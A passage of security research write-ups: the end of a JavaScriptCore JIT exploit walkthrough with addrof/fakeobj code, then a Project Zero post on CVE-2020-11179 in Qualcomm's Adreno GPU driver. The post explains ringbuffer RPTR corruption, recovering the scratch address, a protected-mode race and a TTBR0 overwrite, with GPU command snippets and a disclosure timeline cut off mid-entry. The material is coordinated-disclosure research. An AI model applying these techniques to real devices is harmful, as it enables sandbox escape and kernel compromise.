        return float_arr[OVERLAP_IDX];
    }

    function fakeobj(addr) {
        float_arr[OVERLAP_IDX] = addr;
        return obj_arr[0];
    }

Note the somewhat unintuitive use of the noCoW variable. It is used to prevent JSC from allocating the arrays as copy-on-write arrays, which would otherwise result in the wrong heap layout.

Conclusion

I hope this was already an interesting walkthrough of a “non-standard” JIT compiler bug. Please keep in mind that there are many (JIT) vulnerabilities that are much easier to exploit. On the other hand, the fact that exploitation (up to this point) wasn’t trivial also allowed touching on numerous JSC and JIT compiler internals along the way.

Part 2 will show different ways of achieving an arbitrary read/write primitive from the addrof and fakeobj primitives.

Attacking the Qualcomm Adreno GPU

Posted by Ben Hawkes, Project Zero


When writing an Android exploit, breaking out of the application sandbox is often a key step. There are a wide range of remote attacks that give you code execution with the privileges of an application (like the browser or a messaging application), but a sandbox escape is still required to gain full system access.


This blog post focuses on an interesting attack surface that is accessible from the Android application sandbox: the graphics processing unit (GPU) hardware. We describe an unusual vulnerability in Qualcomm's Adreno GPU, and how it could be used to achieve kernel code execution from within the Android application sandbox.


This research was built upon the work by Guang Gong (@oldfresher), who reported CVE-2019-10567 in August 2019. One year later, in early August 2020, Guang Gong released an excellent whitepaper describing CVE-2019-10567, and some other vulnerabilities that allowed full system compromise by a remote attacker. 


However in June 2020, I noticed that the patch for CVE-2019-10567 was incomplete, and worked with Qualcomm's security team and GPU engineers to fix the issue at its root cause. The patch for this new issue, CVE-2020-11179, has been released to OEM vendors for integration. It's our understanding that Qualcomm will list this publicly in their November 2020 bulletin.


Qualcomm provided the following statement:


"Providing technologies that support robust security and privacy is a priority for Qualcomm Technologies. We commend the security researchers from Google Project Zero for using industry-standard coordinated disclosure practices. Regarding the Qualcomm Adreno GPU vulnerability, we have no evidence it is currently being exploited, and Qualcomm Technologies made a fix available to OEMs in August 2020. We encourage end users to update their devices as patches become available from their carrier or device maker and to only install applications from trusted locations such as the Google Play Store."


Android Attack Surface


The Android application sandbox is an evolving combination of SELinux, seccomp BPF filters, and discretionary access control based on a unique per-application UID. The sandbox is used to limit the resources that an application has access to, and to reduce attack surface. There are a number of well-known routes that attackers use to escape the sandbox, such as: attacking other apps, attacking system services, or attacking the Linux kernel.


At a high-level, there are several different tiers of attack surface in the Android ecosystem. Here are some of the important ones:


  • Tier: Ubiquitous

Description: Issues that affect all devices in the Android ecosystem. 

Example: Core Linux kernel bugs like Dirty COW, or vulnerabilities in standard system services.


  • Tier: Chipset

Description: Issues that affect a substantial portion of the Android ecosystem, based on which type of hardware is used by various OEM vendors.

Example: Snapdragon SoC perf counter vulnerability, or Broadcom WiFi firmware stack overflow.


  • Tier: Vendor

Description: Issues that affect most or all devices from a particular Android OEM vendor

Example: Samsung kernel driver vulnerabilities


  • Tier: Device

Description: Issues that affect a particular device model from an Android OEM vendor

Example: Pixel 4 face unlock "attention aware" vulnerability


From an attacker's perspective, maintaining an Android exploit capability is a question of covering the widest possible range of the Android ecosystem in the most cost-effective way possible. Vulnerabilities in the ubiquitous tier are particularly attractive for affecting a lot of devices, but might be expensive to find and relatively short-lived compared to other tiers. The chipset tier will normally give you quite a lot of coverage with each exploit, but not as much as the ubiquitous tier. For some attack surfaces, such as baseband and WiFi attacks, the chipset tier is your primary option. The vendor and device tiers are easier to find vulnerabilities in, but require that a larger number of individual exploits are maintained.


For sandbox escapes, the GPU offers up a particularly interesting attack surface from the chipset tier. Since GPU acceleration is widely used in applications, the Android sandbox allows full access to the underlying GPU device. Furthermore, there are only two implementations of GPU hardware that are particularly popular in Android devices: ARM Mali and Qualcomm Adreno.


That means that if an attacker can find a nicely exploitable bug in these two GPU implementations, then they can effectively maintain a sandbox escape exploit capability against most of the Android ecosystem. Furthermore, since GPUs are highly complex with a significant amount of closed-source components (such as firmware/microcode), there is a good opportunity to find a reasonably powerful and long-lived vulnerability.


Something Looks Weird


With this in mind, in late April 2020, I noticed the following commit in the Qualcomm Adreno kernel driver code:


From 0ceb2be799b30d2aea41c09f3acb0a8945dd8711 Mon Sep 17 00:00:00 2001
From: Jordan Crouse <[email protected]>
Date: Wed, 11 Sep 2019 08:32:15 -0600
Subject: [PATCH] msm: kgsl: Make the "scratch" global buffer use a random GPU address

Select a random global GPU address for the "scratch" buffer that is used
by the ringbuffer for various tasks.

When we think of adding entropy to addresses, we usually think of Address Space Layout Randomization (ASLR). But here we're talking about a GPU virtual address, not a kernel virtual address. That seems unusual: why would a GPU address need to be randomized?


It was relatively straightforward to confirm that this commit was one of the security patches for CVE-2019-10567, which are linked in Qualcomm's advisory. A related patch was also included for this CVE:


From 8051429d4eca902df863a7ebb3c04cbec06b84b3 Mon Sep 17 00:00:00 2001
From: Jordan Crouse <[email protected]>
Date: Mon, 9 Sep 2019 10:41:36 -0600
Subject: [PATCH] msm: kgsl: Execute user profiling commands in an IB

Execute user profiling in an indirect buffer. This ensures that addresses
and values specified directly from the user don't end up in the
ringbuffer.


And so the question becomes, why exactly is it important that user content doesn't end up on the ringbuffer, and is this patch really sufficient to prevent that? And what happens if we can recover the base address of the scratch mapping? Both at least superficially looked to be possible, so this research project was off to a great start.


Before we go any further, let's take a step back and describe some of the basic components involved here: GPU, ringbuffer, scratch mapping, and so on.


Adreno Introduction


The GPU is the workhorse of modern graphics computing, and most applications use the GPU extensively. From the application's perspective, the specific implementation of GPU hardware is normally abstracted away by libraries such as OpenGL ES and Vulkan. These libraries implement a standard API for programming common GPU accelerated operations, such as texture mapping and running shaders. At a low level however, this functionality is implemented by interacting with the GPU device driver running in kernel space.




Specifically for Qualcomm Adreno, the /dev/kgsl-3d0 device file is ultimately used to implement higher level GPU functionality. The /dev/kgsl-3d0 file is directly accessible within the untrusted application sandbox, because:

  1. The device file has global read/write access set in its file permissions. The permissions are set by ueventd:


sargo:/ # cat /system/vendor/ueventd.rc | grep kgsl-3d0
/dev/kgsl-3d0             0666   system     system

  2. The device file has its SELinux label set to gpu_device, and the untrusted_app SELinux context has a specific allow rule for this label:

sargo:/ # ls -Zal /dev/kgsl-3d0
crw-rw-rw- 1 system system u:object_r:gpu_device:s0 239, 0 2020-07-21 15:48 /dev/kgsl-3d0

$ adb pull /sys/fs/selinux/policy
/sys/fs/selinux/policy: 1 file pulled, 0 skipped. 16.1 MB/s ...
$ sesearch -A -s untrusted_app policy | grep gpu_device
allow untrusted_app gpu_device:chr_file { append getattr ioctl lock map open read write };


This means that the application can open the device file. The Adreno "KGSL" kernel device driver is then primarily invoked through a number of different ioctl calls (e.g. to allocate shared memory, create a GPU context, submit GPU commands, etc.) and mmap (e.g. to map shared memory in to the userspace application).


GPU Shared Mappings


For the most part, applications use shared mappings to load vertices, fragments, and shaders into the GPU and to receive computed results. That means certain physical memory pages are shared between a userland application and the GPU hardware.  


To set up a new shared mapping, the application will ask the KGSL kernel driver for an allocation by calling the IOCTL_KGSL_GPUMEM_ALLOC ioctl. The kernel driver will prepare a region of physical memory, and then map this memory into the GPU's address space (for a particular GPU context, explained below). Finally, the application will map the shared memory into the userland address space by using an identifier returned from the allocation ioctl.
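

For orientation, the userland side of this allocation flow looks roughly like the sketch below. It assumes the msm_kgsl.h UAPI header from Qualcomm's kernel tree (providing IOCTL_KGSL_GPUMEM_ALLOC and struct kgsl_gpumem_alloc); exact structure fields and the mmap convention vary between kernel versions, so treat this as illustrative rather than as a drop-in snippet:

#include <fcntl.h>
#include <stdio.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <linux/msm_kgsl.h>   /* Qualcomm kernel UAPI header (assumed available) */

int main(void) {
    int fd = open("/dev/kgsl-3d0", O_RDWR);   /* reachable from the app sandbox */
    if (fd < 0) { perror("open"); return 1; }

    /* Ask the KGSL driver for a shared allocation; the driver chooses a GPU
     * virtual address and returns it in desc.gpuaddr. */
    struct kgsl_gpumem_alloc desc = { .size = 0x1000, .flags = 0 };
    if (ioctl(fd, IOCTL_KGSL_GPUMEM_ALLOC, &desc) < 0) { perror("ioctl"); return 1; }

    /* Map the same physical pages into the application's address space, using
     * the identifier returned by the allocation ioctl as the mmap offset. */
    void *cpu_view = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED,
                          fd, desc.gpuaddr);
    printf("GPU address: 0x%lx, CPU address: %p\n",
           (unsigned long)desc.gpuaddr, cpu_view);
    return 0;
}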


At this point, there are two distinct views on the same pages of physical memory. The first view is from the userland application, which uses a virtual address to access the memory that is mapped into its address space. The CPU's memory management unit (MMU) will perform address translation to find the appropriate physical page.


The other is the view from the GPU hardware itself, which uses a GPU virtual address. The GPU virtual address is chosen by the KGSL kernel driver, which configures the device's IOMMU (called the SMMU on ARM) with a page table structure that is used just for the GPU. When the GPU tries to read or write the shared memory mapping, the IOMMU will translate the GPU virtual address to a physical page in memory. This is similar to the address translation performed on the CPU, but with a completely different address space (i.e. the pointer value used in the application will be different to the pointer value used in the GPU).




Each userland process has its own GPU context, meaning that while a certain application is running operations on the GPU, the GPU will only be able to access mappings that it shares with that process. This is needed so that one application can't ask the GPU to read the shared mappings from another application. In practice this separation is achieved by changing which set of page tables is loaded into the IOMMU whenever a GPU context switch occurs. A GPU context switch occurs whenever the GPU is scheduled to run a command from a different process.


However certain mappings are used by all GPU contexts, and so can be present in every set of page tables. They are called global shared mappings, and are used for a variety of system and debugging functions between the GPU and the KGSL kernel driver. While they are never mapped directly into a userland application (e.g. a malicious application can't read or modify the contents of the global mappings directly), they are mapped into both the GPU and kernel address spaces.


On a rooted Android device, we can dump the global mappings (and their GPU virtual addresses) using the following command:


sargo:/ # cat /sys/kernel/debug/kgsl/globals
0x00000000fc000000-0x00000000fc000fff             4096 setstate
0x00000000fc001000-0x00000000fc040fff           262144 gpu-qdss
0x00000000fc041000-0x00000000fc048fff            32768 memstore
0x00000000fce7a000-0x00000000fce7afff             4096 scratch
0x00000000fc049000-0x00000000fc049fff             4096 pagetable_desc
0x00000000fc04a000-0x00000000fc04afff             4096 profile_desc
0x00000000fc04b000-0x00000000fc052fff            32768 ringbuffer
0x00000000fc053000-0x00000000fc053fff             4096 pagetable_desc
0x00000000fc054000-0x00000000fc054fff             4096 profile_desc
0x00000000fc055000-0x00000000fc05cfff            32768 ringbuffer
0x00000000fc05d000-0x00000000fc05dfff             4096 pagetable_desc
0x00000000fc05e000-0x00000000fc05efff             4096 profile_desc
0x00000000fc05f000-0x00000000fc066fff            32768 ringbuffer
0x00000000fc067000-0x00000000fc067fff             4096 pagetable_desc
0x00000000fc068000-0x00000000fc068fff             4096 profile_desc
0x00000000fc069000-0x00000000fc070fff            32768 ringbuffer
0x00000000fc071000-0x00000000fc0a0fff           196608 profile
0x00000000fc0a1000-0x00000000fc0a8fff            32768 ucode
0x00000000fc0a9000-0x00000000fc0abfff            12288 capturescript
0x00000000fc0ac000-0x00000000fc116fff           438272 capturescript_regs
0x00000000fc117000-0x00000000fc117fff             4096 powerup_register_list
0x00000000fc118000-0x00000000fc118fff             4096 alwayson
0x00000000fc119000-0x00000000fc119fff             4096 preemption_counters
0x00000000fc11a000-0x00000000fc329fff          2162688 preemption_desc
0x00000000fc32a000-0x00000000fc32afff             4096 perfcounter_save_restore_desc
0x00000000fc32b000-0x00000000fc53afff          2162688 preemption_desc
0x00000000fc53b000-0x00000000fc53bfff             4096 perfcounter_save_restore_desc
0x00000000fc53c000-0x00000000fc74bfff          2162688 preemption_desc
0x00000000fc74c000-0x00000000fc74cfff             4096 perfcounter_save_restore_desc
0x00000000fc74d000-0x00000000fc95cfff          2162688 preemption_desc
0x00000000fc95d000-0x00000000fc95dfff             4096 perfcounter_save_restore_desc
0x00000000fc95e000-0x00000000fc95efff             4096 smmu_info


And suddenly our scratch buffer has appeared! To the left we see the GPU virtual addresses of each global mapping, then a size, and then the name of the allocation. By rebooting the device several times and checking the layout, we can see that the scratch buffer is indeed randomized:


0x00000000fc0df000-0x00000000fc0dffff             4096 scratch
...
0x00000000fcfc0000-0x00000000fcfc0fff             4096 scratch
...
0x00000000fc9ff000-0x00000000fc9fffff             4096 scratch
...
0x00000000fcb4d000-0x00000000fcb4dfff             4096 scratch


The same test reveals that the scratch buffer is the only global mapping that is randomized, all other global mappings have a fixed GPU address in the range [0xFC000000, 0xFD400000]. That makes sense, because the patch for CVE-2019-10567 only introduced the KGSL_MEMDESC_RANDOM flag for the scratch buffer allocation. 


So we now know that the scratch buffer is correctly randomized (at least to some extent), and that it is a global shared mapping present in every GPU context. But what exactly is the scratch buffer used for?


The Scratch Buffer


Diving in to the driver code, we can clearly see the scratch buffer being allocated in the driver's probe routines, meaning that the scratch buffer will be allocated when the device is first initialized:


int adreno_ringbuffer_probe(struct adreno_device *adreno_dev, bool nopreempt)
{
...
status = kgsl_allocate_global(device, &device->scratch,
                            PAGE_SIZE, 0, KGSL_MEMDESC_RANDOM, "scratch");


We also find this useful comment:


 /* SCRATCH MEMORY: The scratch memory is one page worth of data that
 *  is mapped into the GPU. This allows for some 'shared' data between
 *  the GPU and CPU. For example, it will be used by the GPU to write
 *  each updated RPTR for each RB.

By cross referencing all the usages of the resulting memory descriptor (device->scratch) in the kernel driver, we can find two primary usages of the scratch buffer:


  1. The GPU address of a preemption restore buffer is dumped to the scratch memory, which appears to be used if a higher priority GPU command interrupts a lower priority command.

  2. The read pointer (RPTR) of the ringbuffer (RB) is read from scratch memory and used when calculating the amount of free space in the ringbuffer.


Here we can start to connect the dots. Firstly, we know that the patch for CVE-2019-10567 included changes to both the scratch buffer and the ringbuffer handling code -- that suggests we should focus on the second use case above. 


If the GPU is writing RPTR values to the shared mapping (as the comment suggests), and if the kernel driver is reading RPTR values from the scratch buffer and using it for allocation size calculations, then what happens if we can make the GPU write an invalid or incorrect RPTR value?


Ringbuffer Basics


To understand what an invalid RPTR value might mean for a ringbuffer allocation, we first need to describe the ringbuffer itself. When a userland application submits a GPU command (IOCTL_KGSL_GPU_COMMAND), the driver code dispatches the command to the GPU via the ringbuffer, which uses a producer-consumer pattern. The kernel driver will write commands into the ringbuffer, and the GPU will read commands from the ringbuffer.


This occurs in a similar fashion to classical circular buffers. At a low level, the ringbuffer is a global shared mapping with a fixed size of 32768 bytes. Two indices are maintained to track where the CPU is writing to (WPTR), and where the GPU is reading from (RPTR). To allocate space on the ringbuffer, the CPU has to calculate whether there is sufficient room between the current WPTR and the current RPTR. This happens in adreno_ringbuffer_allocspace:


unsigned int *adreno_ringbuffer_allocspace(struct adreno_ringbuffer *rb,
                unsigned int dwords)
{
        struct adreno_device *adreno_dev = ADRENO_RB_DEVICE(rb);
        unsigned int rptr = adreno_get_rptr(rb); [1]
        unsigned int ret;

        if (rptr <= rb->_wptr) { [2]
                unsigned int *cmds;

                if (rb->_wptr + dwords <= (KGSL_RB_DWORDS - 2)) {
                        ret = rb->_wptr;
                        rb->_wptr = (rb->_wptr + dwords) % KGSL_RB_DWORDS;
                        return RB_HOSTPTR(rb, ret);
                }

                /*
                 * There isn't enough space toward the end of ringbuffer. So
                 * look for space from the beginning of ringbuffer upto the
                 * read pointer.
                 */
                if (dwords < rptr) {
                        cmds = RB_HOSTPTR(rb, rb->_wptr);
                        *cmds = cp_packet(adreno_dev, CP_NOP,
                                KGSL_RB_DWORDS - rb->_wptr - 1);
                        rb->_wptr = dwords;
                        return RB_HOSTPTR(rb, 0);
                }
        }

        if (rb->_wptr + dwords < rptr) { [3]
                ret = rb->_wptr;
                rb->_wptr = (rb->_wptr + dwords) % KGSL_RB_DWORDS;
                return RB_HOSTPTR(rb, ret); [4]
        }

        return ERR_PTR(-ENOSPC);
}

unsigned int adreno_get_rptr(struct adreno_ringbuffer *rb)
{
        struct adreno_device *adreno_dev = ADRENO_RB_DEVICE(rb);
        unsigned int rptr = 0;
...
                struct kgsl_device *device = KGSL_DEVICE(adreno_dev);

                kgsl_sharedmem_readl(&device->scratch, &rptr,
                                SCRATCH_RPTR_OFFSET(rb->id)); [5]
...
        return rptr;
}


We can see the RPTR value being read at [1], and that it ultimately comes from a read of the scratch global shared mapping at [5]. Then we can see the scratch RPTR value being used in two comparisons with the WPTR value at [2] and [3]. The first comparison is for the case where the scratch RPTR is less than or equal to WPTR, meaning that there may be free space toward the end of the ringbuffer or at the beginning of the ringbuffer. The second comparison is for the case where the scratch RPTR is higher than the WPTR. If there's enough room between the WPTR and scratch RPTR, then we can use that space for an allocation.


So what happens if the scratch RPTR value is controlled by an attacker? In that case, the attacker could make either one of these conditions succeed, even if there isn't actually space in the ringbuffer for the requested allocation size. For example, we can make the condition at [3] succeed when it normally wouldn't by artificially increasing the value of the scratch RPTR, which at [4] results in returning a portion of the ringbuffer that overlaps the correct RPTR location. 
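

To see the effect with concrete numbers, here is a toy model (plain C, not driver code) of the comparison at [3]: with an honestly reported RPTR the request is refused, while a forged, artificially large RPTR causes the same request to be granted at an offset that overlaps commands the GPU has not yet consumed:

#include <stdio.h>

#define KGSL_RB_DWORDS (32768 / 4)   /* ringbuffer size in 32-bit words */

/* Toy model of the branch at [3]: hand out `dwords` words at the current
 * write pointer if they appear to fit below the (scratch-supplied) rptr. */
static int alloc_offset(unsigned int rptr, unsigned int wptr, unsigned int dwords) {
    if (wptr + dwords < rptr)
        return (int)wptr;
    return -1;   /* "no space" */
}

int main(void) {
    unsigned int true_rptr = 100;   /* GPU has only consumed commands up to here */
    unsigned int wptr      = 90;    /* CPU is about to write here */

    /* Honest RPTR: a 500-word request does not fit and is refused. */
    printf("honest rptr: %d\n", alloc_offset(true_rptr, wptr, 500));
    /* Forged RPTR (written via the GPU to the scratch page): the same request is
     * granted at offset 90, overlapping unconsumed commands at offsets >= 100. */
    printf("forged rptr: %d\n", alloc_offset(8000, wptr, 500));
    return 0;
}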


That means that an attacker could overwrite ringbuffer commands that haven't yet been processed by the GPU with incoming GPU commands! Or in other words, controlling the scratch RPTR value could desynchronize the CPU and GPU's understanding of the ringbuffer layout. That sounds like it could be very useful! But how can we overwrite the scratch RPTR value?


Attacking the Scratch RPTR Value


Since global shared mappings are not mapped into userland, an attacker cannot modify the scratch buffer directly from their malicious/compromised userland process. However we know that the scratch buffer is mapped into every GPU context, including any created by a malicious attacker. What if we could make the GPU hardware write a malicious RPTR value into the scratch buffer on our behalf?  


To achieve this, there are two fundamental steps. Firstly, we need to confirm that the mapping is writable by user-supplied GPU commands. Secondly, we need a way to recover the base GPU address of the scratch mapping. This latter step is necessary due to the recent addition of GPU address randomization for the scratch mapping.


So are all global shared mappings writable by the GPU? It turns out that not every global shared mapping can be written to by user-supplied GPU commands, but the scratch buffer can be. We can confirm this by using the sysfs debugging method above to find the randomized base of the scratch mapping, and then writing a short sequence of GPU commands to write a value to the scratch mapping:


    /* write a value to the scratch buffer at offset 256 */
    *cmds++ = cp_type7_packet(CP_MEM_WRITE, 3);
    cmds += cp_gpuaddr(cmds, SCRATCH_BASE+256);
    *cmds++ = 0x41414141;

    /* ensure that the write has taken effect */
    *cmds++ = cp_type7_packet(CP_WAIT_REG_MEM, 6);
    *cmds++ = 0x13;
    cmds += cp_gpuaddr(cmds, SCRATCH_BASE+256);
    *cmds++ = 0x41414141;
    *cmds++ = 0xffffffff;
    *cmds++ = 0x1;

    /* write 1 to userland shared memory to signal success */
    *cmds++ = cp_type7_packet(CP_MEM_WRITE, 3);
    cmds += cp_gpuaddr(cmds, shared_mem_gpuaddr);
    *cmds++ = 0x1;


Each CP_* operation here is constructed in userspace and run on the GPU hardware. Typically OpenGL library methods and shaders would be translated to these raw operations by a vendor supported library, but an attacker can also construct these command sequences manually by setting up some GPU shared memory and calling IOCTL_KGSL_GPU_COMMAND. These operations aren't documented however, so behavior has to be inferred by reading the driver code and manual tests. Some examples are: 1) the CP_MEM_WRITE operation writes a constant value to a GPU address, 2) the CP_WAIT_REG_MEM operation stalls execution until a GPU address contains a certain constant value, and 3) the CP_MEM_TO_MEM copies data from one GPU address to another.


That means that we can be sure that the GPU successfully wrote to the scratch buffer by checking that the final write occurs (on a normal userland shared memory mapping) -- if the scratch buffer write wasn't successful, the CP_WAIT_REG_MEM operation would time out and no value would be written back.


It's also possible to confirm that the scratch buffer is writable by looking at how the page tables for the global shared mapping are set up in the kernel driver code. Specifically, since the call to kgsl_allocate_global doesn't have KGSL_MEMFLAGS_GPUREADONLY or KGSL_MEMDESC_PRIVILEGED flags set, the resulting mapping is writable by user-supplied GPU commands.


But if the scratch buffer's base address is randomized, how do we know where to write to? There were two approaches to recovering the base address of the scratch buffer.


The first approach is to simply take the GPU command we used above to confirm that the scratch buffer was writable, and turn it into a bruteforce attack. Since we know that global shared mappings have a fixed range, and we know that only the scratch buffer is randomized, we have a very small search space to explore. Once the other static global shared mapping locations are removed from consideration, there are only 2721 possible locations for the scratch page. On average, it took 7.5 minutes to recover the scratch buffer address on a mid-range smartphone device, and this time could likely be optimized further.


The second approach was even better. As mentioned above, the scratch buffer is also used for preemption. To prepare the GPU for preemption, the kernel driver calls the a6xx_preemption_pre_ibsubmit function, which inserts a number of operations into the ringbuffer. The details of those operations aren't very important for our attack, other than the fact that a6xx_preemption_pre_ibsubmit spilled a scratch buffer pointer to the ringbuffer as an argument to a CP_MEM_WRITE operation. 


Since the ringbuffer is a global mapping and readable by user-supplied GPU commands, it was possible to immediately extract the base of the scratch mapping by using a CP_MEM_TO_MEM command at the right offset into the ringbuffer (i.e. we copied the contents of the ringbuffer to an attacker controlled userland shared mapping, and the contents contained a pointer to the randomized scratch buffer).


Overwriting the Ringbuffer


Now that we know we can reliably control the scratch RPTR value, we can turn our attention to corrupting the contents of the ringbuffer. What exactly is contained in the ringbuffer, and what does overwriting it buy us?


There are actually four different ringbuffers, each used for different GPU priorities, but we only need one for this attack, so we choose the ringbuffer that gets used the least on a modern Android device in order to avoid any noise from other applications using the GPU (ringbuffer 0, which at the time wasn't used at all by Android). Note that the ringbuffer global shared mapping uses the KGSL_MEMFLAGS_GPUREADONLY flag, so an attacker cannot directly modify the ringbuffer contents, and we need to use the scratch RPTR primitive to achieve this.


Recall that the ringbuffer is used to send commands from the CPU to the GPU. In practice however, user-supplied GPU commands are never placed directly onto the ringbuffer. This is for two reasons: 1) space in the ringbuffer is limited, and user-supplied GPU commands can be very large, and 2) the ringbuffer is readable by all GPU contexts, and so we want to ensure that one process can't read commands from a different process.


Instead, a layer of indirection occurs, and user-supplied GPU commands are run after an "indirect branch" from the ringbuffer occurs. Conceptually system level commands are executed straight from the ringbuffer, and user level commands are run after an indirect branch into GPU shared memory. Once the user commands finish, control flow will return to the next ringbuffer operation. The indirect branch is performed with a CP_INDIRECT_BUFFER_PFE operation, which is inserted into the ringbuffer by adreno_ringbuffer_submitcmd. This operation takes two parameters, the GPU address of the branch target (e.g. a GPU shared memory mapping with user-supplied commands in it) and a size value.


Aside from the indirect branch operation, the ringbuffer contains a number of other GPU command setup and teardown operations, something a bit like the prologue and epilogue of a compiled function. This includes the preemption setup mentioned earlier, GPU context switches, hooks for performance monitoring, errata fixups, identifiers, and protected mode operations. When considering we have some sort of ringbuffer corruption primitive, protected mode operations certainly sound like a potential target area, so let's explore this further.


Protected Mode


When a user-supplied GPU command is running on the GPU, it runs with protected mode enabled. This means that certain global shared mappings and certain GPU register ranges cannot be accessed (read or written). It turns out that this is critically important to the security model of the GPU architecture.


If we examine the driver code for all instances of protected mode being disabled (using the CP_SET_PROTECTED_MODE operation), we see just a handful of examples. Operations related to preemption, errata fixups, performance counters, and GPU context switches can all potentially run with protected mode disabled.


This last operation, GPU context switches, sounds particularly interesting. As a reminder, the GPU context switch occurs when two different processes are using the same ringbuffer. Since the GPU commands from one process aren't allowed to operate on the shared memory belonging to another process, the context switch is needed to switch out the page tables that the GPU has loaded.


What if we could make the GPU switch to an attacker controlled page table? Not only would our GPU commands be able to read and write shared mappings from other processes, we would be able to read and write to any physical address in memory, including kernel memory!


This is an intriguing proposition, and looking at how the kernel driver sets up the context switch operations in the ringbuffer, it looks alluringly possible. Based on a cursory review of the driver code, it looks like the GPU has an operation to switch page tables called CP_SMMU_TABLE_UPDATE. It's possible that this design was chosen for performance considerations, as it means that the GPU can perform a context switch without having to interrupt the kernel and wait for the IOMMU to be reconfigured -- it can simply reconfigure itself.


Looking further, it looks like the GPU has the IOMMU's "TTBR0" register mapped to a protected mode GPU register as well. By reading the ARM address translation and IOMMU documentation, we can see that TTBR0 is the base address of the page tables used for translating GPU addresses to physical memory addresses. That means if we can point TTBR0 to a set of malicious page tables, then we can translate any GPU address to any physical address of our choosing. 


And suddenly, we have a clear idea of how the original attack in CVE-2019-10567 worked. Recall that aside from randomizing the scratch buffer location, the patch for CVE-2019-10567 also "ensures that addresses and values specified directly from the user don't end up in the ringbuffer". 


We can now study Guang Gong's whitepaper and confirm that his attack managed to use the RPTR corruption technique (at the time using the static address of the scratch buffer) to smuggle operations into the ringbuffer via the arguments to performance profiling commands, which would then be executed due to clever alignment with the "true" RPTR value on the GPU. The smuggled operations disabled protected mode and branched to attacker controlled GPU commands, which promptly overwrote TTBR0 to gain a R/W primitive to arbitrary physical memory. Amazing!


Recovering the Attack


Since we have already bypassed the first part of the patch for CVE-2019-10567 (randomizing the scratch buffer base), to recover the attack (i.e. to be able to use a modified TTBR0 to write physical memory), we simply need to bypass the second part as well.


In essence the second part of the patch for CVE-2019-10567 prevented attacker-controlled commands from being written to the ringbuffer, particularly by the profiling subsystem. The obvious path to bypassing this fix would be to find a different way to smuggle attacker-controlled commands. While there were some exciting looking avenues (such as using the user-supplied GPU address as a command opcode), I decided to pursue a different approach.


Rather than inserting attacker-controlled commands into the ringbuffer, let's use the RPTR ringbuffer corruption primitive to desynchronize and reorder legitimate ringbuffer operations. The two basic ingredients we need are an operation that disables protected mode and an operation that performs an indirect branch -- both of which occur organically within the GPU kernel driver code.


The typical pattern for protected mode operations is to 1) drop protected mode, 2) perform some privileged operations, and 3) re-enable protected mode. Therefore, to recover the attack, we can exploit a race condition between steps 1 and 3. We can start the execution of a privileged operation such as a GPU context switch, and while it is still executing on the GPU with protected mode disabled, we can overwrite the privileged operations using the RPTR ringbuffer corruption primitive, essentially replacing the GPU context switch with an attacker-controlled indirect branch.



In order to win the race condition, we have to write an attacker controlled indirect branch to the correct offset in the ringbuffer (e.g. the offset of a context switch), and we need to time this write operation so that the GPU command processor has executed the operation to disable protected mode, but not yet executed the context switch itself. 


In practice this race condition appears to be highly feasible, and the temporal and spatial conditions are relatively stable. Specifically, by stalling the GPU with a wait command, and then synchronizing the context switch and the ringbuffer corruption primitives, we can establish a relative offset from the wait command where the GPU will first observe writes from the ringbuffer corruption. This discrete boundary likely results from caching behavior or a fixed-size internal prefetch buffer, and it makes it straightforward to calculate the correct layout of padding, payload, and context switch.


The race condition can be won at least 20% of the time, and since a failed attempt has no observable negative effects, the race condition can be repeated as many times as needed, which means that the attack can succeed almost immediately just by running the exploit in a loop. 


Once the attack succeeds, a branch to attacker supplied shared memory occurs while protected mode is disabled. This means that the TTBR0 register described above can be modified to point to an attacker controlled physical page that contains a fake page table structure. In the past (e.g. for rowhammer attacks) the setup of a known physical address has been achieved by using the ION memory allocator or spraying memory through the buddy allocator, and I found some straightforward success with the latter approach.


This allows the attacker to map a GPU address to an arbitrary physical address. At this point the attacker's GPU commands can overwrite kernel code or data structures to achieve arbitrary kernel code execution, which is straightforward since the kernel is located at a fixed physical address on Android kernels.


Final Attack


A proof-of-concept exploit called Adrenaline is available here. The proof-of-concept demonstrates the attack on a Pixel 3a device running sargo-user QQ2A.200501.001.B3 with kernel 4.9.200-gdf3ca60d978c-ab6351706. It overwrites an entry in the kernel's sys_call_table structure to show PC control.


Aside from the 20% success rate of winning the race condition discussed above, the proof-of-concept has two other areas of unreliability: 1) ringbuffer offsets aren't guaranteed to be the same across kernel versions, but should be stable once you calculate them (and could be calculated automatically), and 2) the spray technique used to allocate attacker-controlled data at a known physical address is very basic and used for demonstration purposes only, and there's a chance the chosen fixed page is already in-use. It should be possible to fix point 2 using ION or some other method. 


Patch Timeline


The reported issue was assigned CVE-2020-11179, and was patched by applying GPU firmware and kernel driver changes that enforce new restrictions on memory accesses to the scratch buffer by user-supplied GPU commands (i.e. the scratch buffer is protected while running indirect branches from the ringbuffer).



2020-06-08

Bug report sent to Qualcomm and filed Issue 2052 in the Project Zero issue tracker.

2020-06-08

Qualcomm acknowledges the report and assigns QPSIIR-1378 for tracking.

2020-06-12

Qualcomm agrees to schedule a meeting to discuss the reported issue.

2020-06-16

Project Zero and Qualcomm meet to discuss the attack and potential fixes.

2020-06-16

Additional PoC for the rptr bruteforce attack is shared with Qualcomm, as well as a potential bypass for one of the fix approaches that was discussed. Project Zero asks Qualcomm to coordinate with ecosystem partners as appropriate.

2020-06-23

Request for update regarding the potential fix bypass, fix timeline, and earlier request for coordination.

2020-06-25

Qualcomm confirms that the potential bypass can be resolved with a kernel driver patch, indicates that the patch is targeted for the August bulletin, and says that Project Zero can ask Android Security to coordinate directly with Qualcomm.

2020-06-25

Project Zero informs Android Security that an issue exists and only provides a Qualcomm reference number. Project Zero asks Android Security to coordinate with Qualcomm for any further details.

2020-07-17

Qualcomm gives an update on the progress of a microcode-based fix. The plan is that the fix will be available for OEMs by September 7, but Qualcomm will request an extension to allow more time for patch integration and testing by OEMs.

2020-07-17

Project Zero responds by explaining the option and requirements for a 14-day grace period extension.

2020-07-29

Qualcomm confirms technical details of how the patch will work, and asks for a disclosure date of October 5th, and to withhold the PoC exploit if that's not possible.

2020-07-31

Project Zero replies to confirm a planned disclosure date of September 7 (based on policy), that the PoC will be released on September 7, and that we predict a low likelihood of opportunistic reuse in the near term due to the complexity of the exploit and additional R&D requirements for real-world usage.

2020-08-04

Qualcomm privately shares a security advisory with OEMs. OEMs can then request the fix to be applied to their branch/image.

2020-08-20

Qualcomm shares the current timeline with Project Zero, indicating that they are targeting a November public security bulletin release, and requests a 14-day extension.

2020-08-25

